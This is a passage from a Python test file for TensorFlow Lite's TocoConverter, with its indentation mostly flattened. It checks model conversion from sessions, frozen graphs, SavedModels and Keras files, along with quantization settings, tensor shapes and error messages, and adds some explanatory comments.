# Convert model and ensure model is not None.
converter = lite.TocoConverter.from_session(sess, [in_tensor], [out_tensor])
tflite_model = converter.convert()
self.assertTrue(tflite_model)
# Check values from converted model.
interpreter = Interpreter(model_content=tflite_model)
interpreter.allocate_tensors()
input_details = interpreter.get_input_details()
self.assertEqual(1, len(input_details))
self.assertEqual('Placeholder', input_details[0]['name'])
self.assertEqual(np.float32, input_details[0]['dtype'])
self.assertTrue(([1, 16, 16, 3] == input_details[0]['shape']).all())
self.assertEqual((0., 0.), input_details[0]['quantization'])
output_details = interpreter.get_output_details()
self.assertEqual(1, len(output_details))
self.assertEqual('add', output_details[0]['name'])
self.assertEqual(np.float32, output_details[0]['dtype'])
self.assertTrue(([1, 16, 16, 3] == output_details[0]['shape']).all())
self.assertEqual((0., 0.), output_details[0]['quantization'])
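  # Illustrative note (not part of the original tests): convert() returns the
  # flatbuffer as plain bytes, so persisting the model is just a file write,
  # e.g.:
  #
  #   with open('/tmp/model.tflite', 'wb') as f:   # path is an arbitrary example
  #     f.write(tflite_model)
  #
  # An Interpreter can then be built from disk with
  # Interpreter(model_path='/tmp/model.tflite') instead of model_content.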
def testQuantization(self):
in_tensor_1 = array_ops.placeholder(
shape=[1, 16, 16, 3], dtype=dtypes.float32, name='inputA')
in_tensor_2 = array_ops.placeholder(
shape=[1, 16, 16, 3], dtype=dtypes.float32, name='inputB')
out_tensor = array_ops.fake_quant_with_min_max_args(
in_tensor_1 + in_tensor_2, min=0., max=1., name='output')
sess = session.Session()
# Convert model and ensure model is not None.
converter = lite.TocoConverter.from_session(
sess, [in_tensor_1, in_tensor_2], [out_tensor])
converter.inference_type = lite_constants.QUANTIZED_UINT8
converter.quantized_input_stats = {
'inputA': (0., 1.),
'inputB': (0., 1.)
} # mean, std_dev
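    # Illustrative note: with mean=0. and std_dev=1. the converter derives
    # scale = 1 / std_dev = 1. and zero_point = mean = 0., i.e.
    # real_value ~= (quantized_value - zero_point) * scale, which is what the
    # (1., 0.) quantization assertions below check.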
tflite_model = converter.convert()
self.assertTrue(tflite_model)
# Check values from converted model.
interpreter = Interpreter(model_content=tflite_model)
interpreter.allocate_tensors()
input_details = interpreter.get_input_details()
self.assertEqual(2, len(input_details))
self.assertEqual('inputA', input_details[0]['name'])
self.assertEqual(np.uint8, input_details[0]['dtype'])
self.assertTrue(([1, 16, 16, 3] == input_details[0]['shape']).all())
self.assertEqual((1., 0.),
input_details[0]['quantization']) # scale, zero_point
self.assertEqual('inputB', input_details[1]['name'])
self.assertEqual(np.uint8, input_details[1]['dtype'])
self.assertTrue(([1, 16, 16, 3] == input_details[1]['shape']).all())
self.assertEqual((1., 0.),
input_details[1]['quantization']) # scale, zero_point
output_details = interpreter.get_output_details()
self.assertEqual(1, len(output_details))
self.assertEqual('output', output_details[0]['name'])
self.assertEqual(np.uint8, output_details[0]['dtype'])
self.assertTrue(([1, 16, 16, 3] == output_details[0]['shape']).all())
self.assertTrue(output_details[0]['quantization'][0] > 0) # scale
def testQuantizationInvalid(self):
in_tensor_1 = array_ops.placeholder(
shape=[1, 16, 16, 3], dtype=dtypes.float32, name='inputA')
in_tensor_2 = array_ops.placeholder(
shape=[1, 16, 16, 3], dtype=dtypes.float32, name='inputB')
out_tensor = array_ops.fake_quant_with_min_max_args(
in_tensor_1 + in_tensor_2, min=0., max=1., name='output')
sess = session.Session()
# Convert model and ensure model is not None.
converter = lite.TocoConverter.from_session(
sess, [in_tensor_1, in_tensor_2], [out_tensor])
converter.inference_type = lite_constants.QUANTIZED_UINT8
converter.quantized_input_stats = {'inputA': (0., 1.)} # mean, std_dev
with self.assertRaises(ValueError) as error:
converter.convert()
self.assertEqual(
'Quantization input stats are not available for input tensors '
'\'inputB\'.', str(error.exception))
def testSizeNoneInvalid(self):
in_tensor = array_ops.placeholder(dtype=dtypes.float32)
out_tensor = in_tensor + in_tensor
sess = session.Session()
    # Test None as shape (no shape is defined for the input tensor).
converter = lite.TocoConverter.from_session(sess, [in_tensor], [out_tensor])
with self.assertRaises(ValueError) as error:
converter.convert()
self.assertEqual('Provide an input shape for input array \'Placeholder\'.',
str(error.exception))
def testBatchSizeInvalid(self):
in_tensor = array_ops.placeholder(
shape=[1, None, 16, 3], dtype=dtypes.float32)
out_tensor = in_tensor + in_tensor
sess = session.Session()
# Test invalid shape. None after 1st dimension.
converter = lite.TocoConverter.from_session(sess, [in_tensor], [out_tensor])
with self.assertRaises(ValueError) as error:
converter.convert()
self.assertEqual(
'None is only supported in the 1st dimension. Tensor '
'\'Placeholder\' has invalid shape \'[1, None, 16, 3]\'.',
str(error.exception))
def testBatchSizeValid(self):
in_tensor = array_ops.placeholder(
shape=[None, 16, 16, 3], dtype=dtypes.float32)
out_tensor = in_tensor + in_tensor
sess = session.Session()
# Convert model and ensure model is not None.
converter = lite.TocoConverter.from_session(sess, [in_tensor], [out_tensor])
tflite_model = converter.convert()
self.assertTrue(tflite_model)
# Check values from converted model.
interpreter = Interpreter(model_content=tflite_model)
interpreter.allocate_tensors()
input_details = interpreter.get_input_details()
self.assertEqual(1, len(input_details))
self.assertEqual('Placeholder', input_details[0]['name'])
self.assertEqual(np.float32, input_details[0]['dtype'])
self.assertTrue(([1, 16, 16, 3] == input_details[0]['shape']).all())
self.assertEqual((0., 0.), input_details[0]['quantization'])
output_details = interpreter.get_output_details()
self.assertEqual(1, len(output_details))
self.assertEqual('add', output_details[0]['name'])
self.assertEqual(np.float32, output_details[0]['dtype'])
self.assertTrue(([1, 16, 16, 3] == output_details[0]['shape']).all())
self.assertEqual((0., 0.), output_details[0]['quantization'])
def testFreezeGraph(self):
in_tensor = array_ops.placeholder(
shape=[1, 16, 16, 3], dtype=dtypes.float32)
var = variable_scope.get_variable(
'weights', shape=[1, 16, 16, 3], dtype=dtypes.float32)
out_tensor = in_tensor + var
sess = session.Session()
sess.run(_global_variables_initializer())
# Convert model and ensure model is not None.
converter = lite.TocoConverter.from_session(sess, [in_tensor], [out_tensor])
tflite_model = converter.convert()
self.assertTrue(tflite_model)
# Check values from converted model.
interpreter = Interpreter(model_content=tflite_model)
interpreter.allocate_tensors()
input_details = interpreter.get_input_details()
self.assertEqual(1, len(input_details))
self.assertEqual('Placeholder', input_details[0]['name'])
self.assertEqual(np.float32, input_details[0]['dtype'])
self.assertTrue(([1, 16, 16, 3] == input_details[0]['shape']).all())
self.assertEqual((0., 0.), input_details[0]['quantization'])
output_details = interpreter.get_output_details()
self.assertEqual(1, len(output_details))
self.assertEqual('add', output_details[0]['name'])
self.assertEqual(np.float32, output_details[0]['dtype'])
self.assertTrue(([1, 16, 16, 3] == output_details[0]['shape']).all())
self.assertEqual((0., 0.), output_details[0]['quantization'])
# TODO(nupurgarg): Verify value of contents in GraphViz.
def testGraphviz(self):
in_tensor = array_ops.placeholder(
shape=[1, 16, 16, 3], dtype=dtypes.float32)
out_tensor = in_tensor + in_tensor
sess = session.Session()
# Convert model and ensure model is not None.
converter = lite.TocoConverter.from_session(sess, [in_tensor], [out_tensor])
converter.output_format = lite_constants.GRAPHVIZ_DOT
graphviz_output = converter.convert()
self.assertTrue(graphviz_output)
# TODO(nupurgarg): Verify value of contents in GraphViz.
def testDumpGraphviz(self):
in_tensor = array_ops.placeholder(
shape=[1, 16, 16, 3], dtype=dtypes.float32)
out_tensor = in_tensor + in_tensor
sess = session.Session()
# Convert model and ensure model is not None.
converter = lite.TocoConverter.from_session(sess, [in_tensor], [out_tensor])
graphviz_dir = self.get_temp_dir()
converter.dump_graphviz_dir = graphviz_dir
tflite_model = converter.convert()
self.assertTrue(tflite_model)
# Ensure interpreter is able to allocate and check graphviz data.
interpreter = Interpreter(model_content=tflite_model)
interpreter.allocate_tensors()
num_items_graphviz = len(os.listdir(graphviz_dir))
self.assertTrue(num_items_graphviz)
# Convert model and ensure model is not None.
converter = lite.TocoConverter.from_session(sess, [in_tensor], [out_tensor])
graphviz_dir = self.get_temp_dir()
converter.dump_graphviz_dir = graphviz_dir
converter.dump_graphviz_video = True
tflite_model = converter.convert()
self.assertTrue(tflite_model)
# Ensure graphviz folder has more data after using video flag.
num_items_graphviz_video = len(os.listdir(graphviz_dir))
self.assertTrue(num_items_graphviz_video > num_items_graphviz)
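  # Illustrative note: dump_graphviz_dir writes GraphViz .dot files describing
  # the graph at different stages of conversion; they can be rendered with the
  # standard graphviz tools, e.g. `dot -Tpdf stage.dot -o stage.pdf` (file names
  # here are placeholders).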
def testInferenceInputType(self):
in_tensor = array_ops.placeholder(
shape=[1, 16, 16, 3], dtype=dtypes.float32)
out_tensor = in_tensor + in_tensor
sess = session.Session()
# Convert model and ensure model is not None.
converter = lite.TocoConverter.from_session(sess, [in_tensor], [out_tensor])
converter.inference_input_type = lite_constants.QUANTIZED_UINT8
converter.quantized_input_stats = {'Placeholder': (0., 1.)} # mean, std_dev
tflite_model = converter.convert()
self.assertTrue(tflite_model)
# Check values from converted model.
interpreter = Interpreter(model_content=tflite_model)
interpreter.allocate_tensors()
input_details = interpreter.get_input_details()
self.assertEqual(1, len(input_details))
self.assertEqual('Placeholder', input_details[0]['name'])
self.assertEqual(np.uint8, input_details[0]['dtype'])
self.assertTrue(([1, 16, 16, 3] == input_details[0]['shape']).all())
self.assertEqual((1., 0.), input_details[0]['quantization'])
output_details = interpreter.get_output_details()
self.assertEqual(1, len(output_details))
self.assertEqual('add', output_details[0]['name'])
self.assertEqual(np.float32, output_details[0]['dtype'])
self.assertTrue(([1, 16, 16, 3] == output_details[0]['shape']).all())
def testDefaultRangesStats(self):
in_tensor = array_ops.placeholder(
shape=[1, 16, 16, 3], dtype=dtypes.float32)
out_tensor = in_tensor + in_tensor
sess = session.Session()
# Convert model and ensure model is not None.
converter = lite.TocoConverter.from_session(sess, [in_tensor], [out_tensor])
converter.inference_type = lite_constants.QUANTIZED_UINT8
converter.quantized_input_stats = {'Placeholder': (0., 1.)} # mean, std_dev
converter.default_ranges_stats = (0, 6) # min, max
tflite_model = converter.convert()
self.assertTrue(tflite_model)
# Check values from converted model.
interpreter = Interpreter(model_content=tflite_model)
interpreter.allocate_tensors()
input_details = interpreter.get_input_details()
self.assertEqual(1, len(input_details))
self.assertEqual('Placeholder', input_details[0]['name'])
self.assertEqual(np.uint8, input_details[0]['dtype'])
self.assertTrue(([1, 16, 16, 3] == input_details[0]['shape']).all())
self.assertEqual((1., 0.), input_details[0]['quantization'])
output_details = interpreter.get_output_details()
self.assertEqual(1, len(output_details))
self.assertEqual('add', output_details[0]['name'])
self.assertEqual(np.uint8, output_details[0]['dtype'])
self.assertTrue(([1, 16, 16, 3] == output_details[0]['shape']).all())
self.assertTrue(output_details[0]['quantization'][0] > 0) # scale
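  # Illustrative note: default_ranges_stats provides a fallback (min, max) range
  # for tensors that carry no fake-quant statistics of their own, which is what
  # lets this graph (no FakeQuant ops) convert with
  # inference_type=QUANTIZED_UINT8, at some cost in accuracy.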
def testPostTrainingQuantize(self):
np.random.seed(0)
# We need the tensor to have more than 1024 elements for quantize_weights
# to kick in. Thus, the [33, 33] shape.
in_tensor_1 = array_ops.placeholder(
shape=[33, 33], dtype=dtypes.float32, name='inputA')
in_tensor_2 = constant_op.constant(
np.random.uniform(low=-10., high=10., size=(33, 33)),
shape=[33, 33],
dtype=dtypes.float32,
name='inputB')
out_tensor = math_ops.matmul(in_tensor_1, in_tensor_2, name='output')
sess = session.Session()
# Convert float model.
float_converter = lite.TocoConverter.from_session(sess, [in_tensor_1],
[out_tensor])
float_tflite = float_converter.convert()
self.assertTrue(float_tflite)
# Convert quantized weights model.
quantized_converter = lite.TocoConverter.from_session(
sess, [in_tensor_1], [out_tensor])
quantized_converter.post_training_quantize = True
quantized_tflite = quantized_converter.convert()
self.assertTrue(quantized_tflite)
# Ensure that the quantized weights tflite model is smaller.
self.assertTrue(len(quantized_tflite) < len(float_tflite))
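  # Illustrative note: post_training_quantize quantizes only the weights (to 8
  # bits) while activations remain float, so the size reduction asserted above
  # is roughly 4x for float32 weight tensors large enough to be converted.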
def testExtendedMode(self):
in_tensor = array_ops.placeholder(
shape=[1, 16, 16, 3], dtype=dtypes.float32)
out_tensor = in_tensor + in_tensor
sess = session.Session()
# Convert model and ensure model is not None.
converter = lite.TocoConverter.from_session(sess, [in_tensor], [out_tensor])
converter.converter_mode = lite.ConverterMode.TOCO_EXTENDED_ALL
tflite_model = converter.convert()
self.assertTrue(tflite_model)
# Ensures the model contains TensorFlow ops.
# TODO(nupurgarg): Check values once there is a Python delegate interface.
interpreter = Interpreter(model_content=tflite_model)
with self.assertRaises(RuntimeError) as error:
interpreter.allocate_tensors()
self.assertIn(
'Regular TensorFlow ops are not supported by this interpreter. Make '
'sure you invoke the Eager delegate before inference.',
str(error.exception))
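  # Illustrative note: ConverterMode.TOCO_EXTENDED_ALL lets ops without a TFLite
  # builtin be emitted as TensorFlow ops inside the flatbuffer; executing such a
  # model needs the Eager/Flex delegate, which is why the plain
  # allocate_tensors() call above raises the asserted RuntimeError.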
class FromFrozenGraphFile(test_util.TensorFlowTestCase):
def testFloat(self):
in_tensor = array_ops.placeholder(
shape=[1, 16, 16, 3], dtype=dtypes.float32)
_ = in_tensor + in_tensor
sess = session.Session()
# Write graph to file.
graph_def_file = os.path.join(self.get_temp_dir(), 'model.pb')
write_graph(sess.graph_def, '', graph_def_file, False)
sess.close()
# Convert model and ensure model is not None.
converter = lite.TocoConverter.from_frozen_graph(graph_def_file,
['Placeholder'], ['add'])
tflite_model = converter.convert()
self.assertTrue(tflite_model)
# Check values from converted model.
interpreter = Interpreter(model_content=tflite_model)
interpreter.allocate_tensors()
input_details = interpreter.get_input_details()
self.assertEqual(1, len(input_details))
self.assertEqual('Placeholder', input_details[0]['name'])
self.assertEqual(np.float32, input_details[0]['dtype'])
self.assertTrue(([1, 16, 16, 3] == input_details[0]['shape']).all())
self.assertEqual((0., 0.), input_details[0]['quantization'])
output_details = interpreter.get_output_details()
self.assertEqual(1, len(output_details))
self.assertEqual('add', output_details[0]['name'])
self.assertEqual(np.float32, output_details[0]['dtype'])
self.assertTrue(([1, 16, 16, 3] == output_details[0]['shape']).all())
self.assertEqual((0., 0.), output_details[0]['quantization'])
def testFloatWithShapesArray(self):
in_tensor = array_ops.placeholder(
shape=[1, 16, 16, 3], dtype=dtypes.float32)
_ = in_tensor + in_tensor
sess = session.Session()
# Write graph to file.
graph_def_file = os.path.join(self.get_temp_dir(), 'model.pb')
write_graph(sess.graph_def, '', graph_def_file, False)
sess.close()
# Convert model and ensure model is not None.
converter = lite.TocoConverter.from_frozen_graph(
graph_def_file, ['Placeholder'], ['add'],
input_shapes={'Placeholder': [1, 16, 16, 3]})
tflite_model = converter.convert()
self.assertTrue(tflite_model)
# Check values from converted model.
interpreter = Interpreter(model_content=tflite_model)
interpreter.allocate_tensors()
input_details = interpreter.get_input_details()
self.assertEqual(1, len(input_details))
self.assertTrue(([1, 16, 16, 3] == input_details[0]['shape']).all())
def testFreezeGraph(self):
in_tensor = array_ops.placeholder(
shape=[1, 16, 16, 3], dtype=dtypes.float32)
var = variable_scope.get_variable(
'weights', shape=[1, 16, 16, 3], dtype=dtypes.float32)
_ = in_tensor + var
sess = session.Session()
# Write graph to file.
graph_def_file = os.path.join(self.get_temp_dir(), 'model.pb')
write_graph(sess.graph_def, '', graph_def_file, False)
sess.close()
# Ensure the graph with variables cannot be converted.
with self.assertRaises(ValueError) as error:
lite.TocoConverter.from_frozen_graph(graph_def_file, ['Placeholder'],
['add'])
self.assertEqual('Please freeze the graph using freeze_graph.py.',
str(error.exception))
def testPbtxt(self):
in_tensor = array_ops.placeholder(
shape=[1, 16, 16, 3], dtype=dtypes.float32)
_ = in_tensor + in_tensor
sess = session.Session()
# Write graph to file.
graph_def_file = os.path.join(self.get_temp_dir(), 'model.pbtxt')
write_graph(sess.graph_def, '', graph_def_file, True)
sess.close()
# Convert model and ensure model is not None.
converter = lite.TocoConverter.from_frozen_graph(graph_def_file,
['Placeholder'], ['add'])
tflite_model = converter.convert()
self.assertTrue(tflite_model)
# Check values from converted model.
interpreter = Interpreter(model_content=tflite_model)
interpreter.allocate_tensors()
input_details = interpreter.get_input_details()
self.assertEqual(1, len(input_details))
self.assertEqual('Placeholder', input_details[0]['name'])
self.assertEqual(np.float32, input_details[0]['dtype'])
self.assertTrue(([1, 16, 16, 3] == input_details[0]['shape']).all())
self.assertEqual((0., 0.), input_details[0]['quantization'])
output_details = interpreter.get_output_details()
self.assertEqual(1, len(output_details))
self.assertEqual('add', output_details[0]['name'])
self.assertEqual(np.float32, output_details[0]['dtype'])
self.assertTrue(([1, 16, 16, 3] == output_details[0]['shape']).all())
self.assertEqual((0., 0.), output_details[0]['quantization'])
def testInvalidFileNotFound(self):
with self.assertRaises(IOError) as error:
lite.TocoConverter.from_frozen_graph('invalid_file', ['Placeholder'],
['add'])
self.assertEqual('File \'invalid_file\' does not exist.',
str(error.exception))
def testInvalidFileBadData(self):
graph_def_file = os.path.join(self.get_temp_dir(), 'invalid_file')
with gfile.Open(graph_def_file, 'wb') as temp_file:
temp_file.write('bad data')
temp_file.flush()
# Attempts to convert the invalid model.
with self.assertRaises(IOError) as error:
lite.TocoConverter.from_frozen_graph(graph_def_file, ['Placeholder'],
['add'])
self.assertEqual(
'Unable to parse input file \'{}\'.'.format(graph_def_file),
str(error.exception))
# TODO(nupurgarg): Test model loading in open source.
def _initObjectDetectionArgs(self):
# Initializes the arguments required for the object detection model.
self._graph_def_file = resource_loader.get_path_to_datafile(
'testdata/tflite_graph.pb')
self._input_arrays = ['normalized_input_image_tensor']
self._output_arrays = [
'TFLite_Detection_PostProcess', 'TFLite_Detection_PostProcess:1',
'TFLite_Detection_PostProcess:2', 'TFLite_Detection_PostProcess:3'
]
self._input_shapes = {'normalized_input_image_tensor': [1, 300, 300, 3]}
def testTFLiteGraphDef(self):
# Tests the object detection model that cannot be loaded in TensorFlow.
self._initObjectDetectionArgs()
converter = lite.TocoConverter.from_frozen_graph(
self._graph_def_file, self._input_arrays, self._output_arrays,
self._input_shapes)
converter.allow_custom_ops = True
tflite_model = converter.convert()
self.assertTrue(tflite_model)
# Check values from converted model.
interpreter = Interpreter(model_content=tflite_model)
interpreter.allocate_tensors()
input_details = interpreter.get_input_details()
self.assertEqual(1, len(input_details))
self.assertEqual('normalized_input_image_tensor', input_details[0]['name'])
self.assertEqual(np.float32, input_details[0]['dtype'])
self.assertTrue(([1, 300, 300, 3] == input_details[0]['shape']).all())
self.assertEqual((0., 0.), input_details[0]['quantization'])
output_details = interpreter.get_output_details()
self.assertEqual(4, len(output_details))
self.assertEqual('TFLite_Detection_PostProcess', output_details[0]['name'])
self.assertEqual(np.float32, output_details[0]['dtype'])
self.assertTrue(([1, 10, 4] == output_details[0]['shape']).all())
self.assertEqual((0., 0.), output_details[0]['quantization'])
self.assertEqual('TFLite_Detection_PostProcess:1',
output_details[1]['name'])
self.assertTrue(([1, 10] == output_details[1]['shape']).all())
self.assertEqual('TFLite_Detection_PostProcess:2',
output_details[2]['name'])
self.assertTrue(([1, 10] == output_details[2]['shape']).all())
self.assertEqual('TFLite_Detection_PostProcess:3',
output_details[3]['name'])
self.assertTrue(([1] == output_details[3]['shape']).all())
def testTFLiteGraphDefMissingShape(self):
# Tests invalid cases for the model that cannot be loaded in TensorFlow.
self._initObjectDetectionArgs()
# Missing `input_shapes`.
with self.assertRaises(ValueError) as error:
lite.TocoConverter.from_frozen_graph(
self._graph_def_file, self._input_arrays, self._output_arrays)
self.assertEqual('input_shapes must be defined for this model.',
str(error.exception))
def testTFLiteGraphDefInvalidShape(self):
# Tests invalid cases for the model that cannot be loaded in TensorFlow.
self._initObjectDetectionArgs()
# `input_shapes` does not contain the names in `input_arrays`.
with self.assertRaises(ValueError) as error:
lite.TocoConverter.from_frozen_graph(
self._graph_def_file,
self._input_arrays,
self._output_arrays,
input_shapes={'invalid-value': [1, 19]})
self.assertEqual(
'input_shapes must contain a value for each item in input_array.',
str(error.exception))
class FromSavedModelTest(test_util.TensorFlowTestCase):
def _createSavedModel(self, shape):
"""Create a simple SavedModel."""
saved_model_dir = os.path.join(self.get_temp_dir(), 'simple_savedmodel')
with session.Session() as sess:
in_tensor_1 = array_ops.placeholder(
shape=shape, dtype=dtypes.float32, name='inputB')
in_tensor_2 = array_ops.placeholder(
shape=shape, dtype=dtypes.float32, name='inputA')
out_tensor = in_tensor_1 + in_tensor_2
inputs = {'x': in_tensor_1, 'y': in_tensor_2}
outputs = {'z': out_tensor}
saved_model.simple_save(sess, saved_model_dir, inputs, outputs)
return saved_model_dir
def testSimpleModel(self):
"""Test a SavedModel."""
saved_model_dir = self._createSavedModel(shape=[1, 16, 16, 3])
# Convert model and ensure model is not None.
converter = lite.TocoConverter.from_saved_model(saved_model_dir)
tflite_model = converter.convert()
self.assertTrue(tflite_model)
interpreter = Interpreter(model_content=tflite_model)
interpreter.allocate_tensors()
input_details = interpreter.get_input_details()
self.assertEqual(2, len(input_details))
self.assertEqual('inputA', input_details[0]['name'])
self.assertEqual(np.float32, input_details[0]['dtype'])
self.assertTrue(([1, 16, 16, 3] == input_details[0]['shape']).all())
self.assertEqual((0., 0.), input_details[0]['quantization'])
self.assertEqual('inputB', input_details[1]['name'])
self.assertEqual(np.float32, input_details[1]['dtype'])
self.assertTrue(([1, 16, 16, 3] == input_details[1]['shape']).all())
self.assertEqual((0., 0.), input_details[1]['quantization'])
output_details = interpreter.get_output_details()
self.assertEqual(1, len(output_details))
self.assertEqual('add', output_details[0]['name'])
self.assertEqual(np.float32, output_details[0]['dtype'])
self.assertTrue(([1, 16, 16, 3] == output_details[0]['shape']).all())
self.assertEqual((0., 0.), output_details[0]['quantization'])
def testNoneBatchSize(self):
"""Test a SavedModel, with None in input tensor's shape."""
saved_model_dir = self._createSavedModel(shape=[None, 16, 16, 3])
converter = lite.TocoConverter.from_saved_model(saved_model_dir)
tflite_model = converter.convert()
self.assertTrue(tflite_model)
# Check values from converted model.
interpreter = Interpreter(model_content=tflite_model)
interpreter.allocate_tensors()
input_details = interpreter.get_input_details()
self.assertEqual(2, len(input_details))
self.assertEqual('inputA', input_details[0]['name'])
self.assertEqual(np.float32, input_details[0]['dtype'])
self.assertTrue(([1, 16, 16, 3] == input_details[0]['shape']).all())
self.assertEqual((0., 0.), input_details[0]['quantization'])
self.assertEqual('inputB', input_details[1]['name'])
self.assertEqual(np.float32, input_details[1]['dtype'])
self.assertTrue(([1, 16, 16, 3] == input_details[1]['shape']).all())
self.assertEqual((0., 0.), input_details[1]['quantization'])
output_details = interpreter.get_output_details()
self.assertEqual(1, len(output_details))
self.assertEqual('add', output_details[0]['name'])
self.assertEqual(np.float32, output_details[0]['dtype'])
self.assertTrue(([1, 16, 16, 3] == output_details[0]['shape']).all())
self.assertEqual((0., 0.), output_details[0]['quantization'])
def testOrderInputArrays(self):
"""Test a SavedModel ordering of input arrays."""
saved_model_dir = self._createSavedModel(shape=[1, 16, 16, 3])
converter = lite.TocoConverter.from_saved_model(
saved_model_dir, input_arrays=['inputB', 'inputA'])
tflite_model = converter.convert()
self.assertTrue(tflite_model)
# Check values from converted model.
interpreter = Interpreter(model_content=tflite_model)
interpreter.allocate_tensors()
input_details = interpreter.get_input_details()
self.assertEqual(2, len(input_details))
self.assertEqual('inputA', input_details[0]['name'])
self.assertEqual(np.float32, input_details[0]['dtype'])
self.assertTrue(([1, 16, 16, 3] == input_details[0]['shape']).all())
self.assertEqual((0., 0.), input_details[0]['quantization'])
self.assertEqual('inputB', input_details[1]['name'])
self.assertEqual(np.float32, input_details[1]['dtype'])
self.assertTrue(([1, 16, 16, 3] == input_details[1]['shape']).all())
self.assertEqual((0., 0.), input_details[1]['quantization'])
output_details = interpreter.get_output_details()
self.assertEqual(1, len(output_details))
self.assertEqual('add', output_details[0]['name'])
self.assertEqual(np.float32, output_details[0]['dtype'])
self.assertTrue(([1, 16, 16, 3] == output_details[0]['shape']).all())
self.assertEqual((0., 0.), output_details[0]['quantization'])
def testSubsetInputArrays(self):
"""Test a SavedModel with a subset of the input array names of the model."""
saved_model_dir = self._createSavedModel(shape=[1, 16, 16, 3])
# Check case where input shape is given.
converter = lite.TocoConverter.from_saved_model(
saved_model_dir,
input_arrays=['inputA'],
input_shapes={'inputA': [1, 16, 16, 3]})
tflite_model = converter.convert()
self.assertTrue(tflite_model)
# Check case where input shape is None.
converter = lite.TocoConverter.from_saved_model(
saved_model_dir, input_arrays=['inputA'], input_shapes={'inputA': None})
tflite_model = converter.convert()
self.assertTrue(tflite_model)
class FromKerasFile(test_util.TensorFlowTestCase):
def setUp(self):
keras.backend.clear_session()
def _getSequentialModel(self):
with session.Session().as_default():
model = keras.models.Sequential()
model.add(keras.layers.Dense(2, input_shape=(3,)))
model.add(keras.layers.RepeatVector(3))
model.add(keras.layers.TimeDistributed(keras.layers.Dense(3)))
model.compile(
loss=keras.losses.MSE,
optimizer=keras.optimizers.RMSprop(),
metrics=[keras.metrics.categorical_accuracy],
sample_weight_mode='temporal')
x = np.random.random((1, 3))
y = np.random.random((1, 3, 3))
model.train_on_batch(x, y)
model.predict(x)
      fd, keras_file = tempfile.mkstemp('.h5')
      try:
        keras.models.save_model(model, keras_file)
      finally:
        os.close(fd)
return keras_file
def testSequentialModel(self):
"""Test a Sequential tf.keras model with default inputs."""
keras_file = self._getSequentialModel()
converter = lite.TocoConverter.from_keras_model_file(keras_file)
tflite_model = converter.convert()
self.assertTrue(tflite_model)
# Check tensor details of converted model.
interpreter = Interpreter(model_content=tflite_model)
interpreter.allocate_tensors()
input_details = interpreter.get_input_details()
self.assertEqual(1, len(input_details))
self.assertEqual('dense_input', input_details[0]['name'])
self.assertEqual(np.float32, input_details[0]['dtype'])
self.assertTrue(([1, 3] == input_details[0]['shape']).all())
self.assertEqual((0., 0.), input_details[0]['quantization'])
output_details = interpreter.get_output_details()
self.assertEqual(1, len(output_details))
self.assertEqual('time_distributed/Reshape_1', output_details[0]['name'])
self.assertEqual(np.float32, output_details[0]['dtype'])
self.assertTrue(([1, 3, 3] == output_details[0]['shape']).all())
self.assertEqual((0., 0.), output_details[0]['quantization'])
# Check inference of converted model.
input_data = np.array([[1, 2, 3]], dtype=np.float32)
interpreter.set_tensor(input_details[0]['index'], input_data)
interpreter.invoke()
tflite_result = interpreter.get_tensor(output_details[0]['index'])
keras_model = keras.models.load_model(keras_file)
keras_result = keras_model.predict(input_data)
np.testing.assert_almost_equal(tflite_result, keras_result, 5)
os.remove(keras_file)
def testSequentialModelInputArray(self):
"""Test a Sequential tf.keras model testing input arrays argument."""
keras_file = self._getSequentialModel()
# Invalid input array raises error.
with self.assertRaises(ValueError) as error:
lite.TocoConverter.from_keras_model_file(
keras_file, input_arrays=['invalid-input'])
self.assertEqual("Invalid tensors 'invalid-input' were found.",
str(error.exception))
# Valid input array.
converter = lite.TocoConverter.from_keras_model_file(
keras_file, input_arrays=['dense_input'])
tflite_model = converter.convert()
os.remove(keras_file)
self.assertTrue(tflite_model)
def testSequentialModelInputShape(self):
"""Test a Sequential tf.keras model testing input shapes argument."""
keras_file = self._getSequentialModel()
# Passing in shape of invalid input array has no impact as long as all input
# arrays have a shape.
converter = lite.TocoConverter.from_keras_model_file(
keras_file, input_shapes={'invalid-input': [2, 3]})
tflite_model = converter.convert()
self.assertTrue(tflite_model)
# Passing in shape of valid input array.
converter = lite.TocoConverter.from_keras_model_file(
keras_file, input_shapes={'dense_input': [2, 3]})
tflite_model = converter.convert()
os.remove(keras_file)
self.assertTrue(tflite_model)
# Check input shape from converted model.
interpreter = Interpreter(model_content=tflite_model)
interpreter.allocate_tensors()
input_details = interpreter.get_input_details()
self.assertEqual(1, len(input_details))
self.assertEqual('dense_input', input_details[0]['name'])
self.assertTrue(([2, 3] == input_details[0]['shape']).all())
def testSequentialModelOutputArray(self):
"""Test a Sequential tf.keras model testing output arrays argument."""
keras_file = self._getSequentialModel()
# Invalid output array raises error.
with self.assertRaises(ValueError) as error:
lite.TocoConverter.from_keras_model_file(
keras_file, output_arrays=['invalid-output'])
self.assertEqual("Invalid tensors 'invalid-output' were found.",
str(error.exception))
# Valid output array.
converter = lite.TocoConverter.from_keras_model_file(
keras_file, output_arrays=['time_distributed/Reshape_1'])
tflite_model = converter.convert()
os.remove(keras_file)
self.assertTrue(tflite_model)
def testFunctionalModel(self):
"""Test a Functional tf.keras model with default inputs."""
with session.Session().as_default():
inputs = keras.layers.Input(shape=(3,), name='input')
x = keras.layers.Dense(2)(inputs)
output = keras.layers.Dense(3)(x)
model = keras.models.Model(inputs, output)
model.compile(
loss=keras.losses.MSE,
optimizer=keras.optimizers.RMSprop(),
metrics=[keras.metrics.categorical_accuracy])
x = np.random.random((1, 3))
y = np.random.random((1, 3))
model.train_on_batch(x, y)
model.predict(x)
fd, keras_file = tempfile.mkstemp('.h5')
try:
keras.models.save_model(model, keras_file)
finally:
os.close(fd)
# Convert to TFLite model.
converter = lite.TocoConverter.from_keras_model_file(keras_file)
tflite_model = converter.convert()
self.assertTrue(tflite_model)
# Check tensor details of converted model.
interpreter = Interpreter(model_content=tflite_model)
interpreter.allocate_tensors()
input_details = interpreter.get_input_details()
self.assertEqual(1, len(input_details))
self.assertEqual('input', input_details[0]['name'])
self.assertEqual(np.float32, input_details[0]['dtype'])
self.assertTrue(([1, 3] == input_details[0]['shape']).all())
self.assertEqual((0., 0.), input_details[0]['quantization'])
output_details = interpreter.get_output_details()
self.assertEqual(1, len(output_details))
self.assertEqual('dense_1/BiasAdd', output_details[0]['name'])
self.assertEqual(np.float32, output_details[0]['dtype'])
self.assertTrue(([1, 3] == output_details[0]['shape']).all())
self.assertEqual((0., 0.), output_details[0]['quantization'])
# Check inference of converted model.
input_data = np.array([[1, 2, 3]], dtype=np.float32)
